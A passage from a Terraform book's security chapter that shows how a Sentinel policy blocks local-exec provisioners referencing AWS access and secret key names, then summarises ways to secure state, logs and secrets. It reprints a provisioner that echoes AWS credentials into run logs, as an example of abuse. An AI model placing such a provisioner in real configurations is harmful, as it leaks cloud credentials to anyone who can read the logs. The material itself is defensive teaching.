The following is a trivial Sentinel policy that passes for all use cases:
main = rule { ❶
true
}
❶ A policy with a single rule that always evaluates to true
The goal of this book isn’t to teach Sentinel, but I want to give you a feel for the practical problems you can solve with it. Consider the dilemma we had earlier with being able to print environment variables such as AWS_ACCESS_KEY_ID
and AWS_SECRET _ACCESS_KEY
using local-exec
provisioners. Here’s the code that did this:
resource "null_resource" "uh_oh" { provisioner "local-exec" { command = <<-EOF echo "access_key=$AWS_ACCESS_KEY_ID" echo "secret_key=$AWS_SECRET_ACCESS_KEY" EOF } }
Without Sentinel, you would have to manually skim through all the configuration code to make sure nobody is abusing local-exec
provisioners this way. With Sentinel, you can write a policy to automatically block all Terraform runs containing configuration code that has the keyword AWS_ACCESS_KEY_ID
or AWS_SECRET_ACCESS _KEY
in a provisioner. The following Sentinel policy does just that.
Listing 13.10 Sentinel policy for validating local-exec provisioners
import "tfconfig/v2" as tfconfig
keywordInProvisioners = func(s){
bad_provisioners = filter tfconfig.provisioners as _, p {
p.type is "local-exec" and
p.config.command["constant_value"] matches s
}
return length(bad_provisioners) > 0
}
no_access_keys = rule {
not keywordInProvisioners("AWS_ACCESS_KEY_ID")
}
no_secret_keys = rule {
not keywordInProvisioners("AWS_SECRET_ACCESS_KEY")
}
main = rule { ❶
no_access_keys and
no_secret_keys
}
❶ Rule that disallows access keys and secret keys from being printed by local-exec provisioners
Note Sentinel policies are not easy to write! You should expect a steep learning curve even if you are already a skilled programmer.
If we incorporate this Sentinel policy as part of our CI/CD pipeline, a subsequent run fails with the following error message:
$ sentinel apply p.sentinel Fail Execution trace. The information below will show the values of all the rules evaluated and their intermediate boolean expressions. Note that some boolean expressions may be missing if short-circuit logic was taken. FALSE - p.sentinel:19:1 - Rule "main" ❶ FALSE - p.sentinel:20:2 - no_access_keys FALSE - p.sentinel:12:2 - not keywordInProvisioners("AWS_ACCESS_KEY_ID") TRUE - p.sentinel:5:3 - p.type is "local-exec" TRUE - p.sentinel:6:3 - p.config.command["constant_value"] matches s FALSE - p.sentinel:11:1 - Rule "no_access_keys" TRUE - p.sentinel:5:3 - p.type is "local-exec" TRUE - p.sentinel:6:3 - p.config.command["constant_value"] matches s
❶ The main rule has failed because the “no_access_keys” composition rule has failed.
You can use Sentinel to enforce that any attribute on any resource is what you want it to be. Examples of other common policies include disallowing 0.0.0.0/0 Classless Inter-Domain Routing (CIDR) blocks, restricting instance types of Elastic Compute Service (EC2) instances, and enforcing tagging on resources.
TIP If you are not a programmer or don’t have time to write your own policies, you can also use policies written by other people (which are published as Sentinel modules).
We are at the end of the last chapter of the book. You now know the fundamentals of Terraform, which are important as an individual contributor, as well as how to manage, extend, automate, and secure Terraform. You know all the tricks and backdoors that hackers can use to steal your sensitive information—and, more important, you know how to fight back. At this point, you should feel extremely confident in your ability to tackle any problem with Terraform. You are a Terraform guru now, and people will look to you for guidance on the subject matter.
Even though this is the end of our journey together, I hope you will have many more great experiences working with Terraform in the future. Please email me or leave a review if you liked the book. Thanks for reading.
State files can be secured by removing unnecessary secrets, with least-privileged access control, and using encryption at rest
Log files can be secured by turning off trace logs and avoiding the use of local-exec provisioners, external data sources, and the HTTP provider.
Static secrets should be set as environment variables whenever possible. If you absolutely must use Terraform variables, consider maintaining a separate secrets.tfvars file explicitly for this purpose.
Dynamic secrets are far safer than static secrets because they are created on demand and valid for only the period of time they will be used. You can read dynamic secrets with the corresponding data source from Vault or the AWS provider.
Sentinel can enforce policy as code. Sentinel policies automatically reject Terraform runs based on the contents of the configuration code or the results of a plan.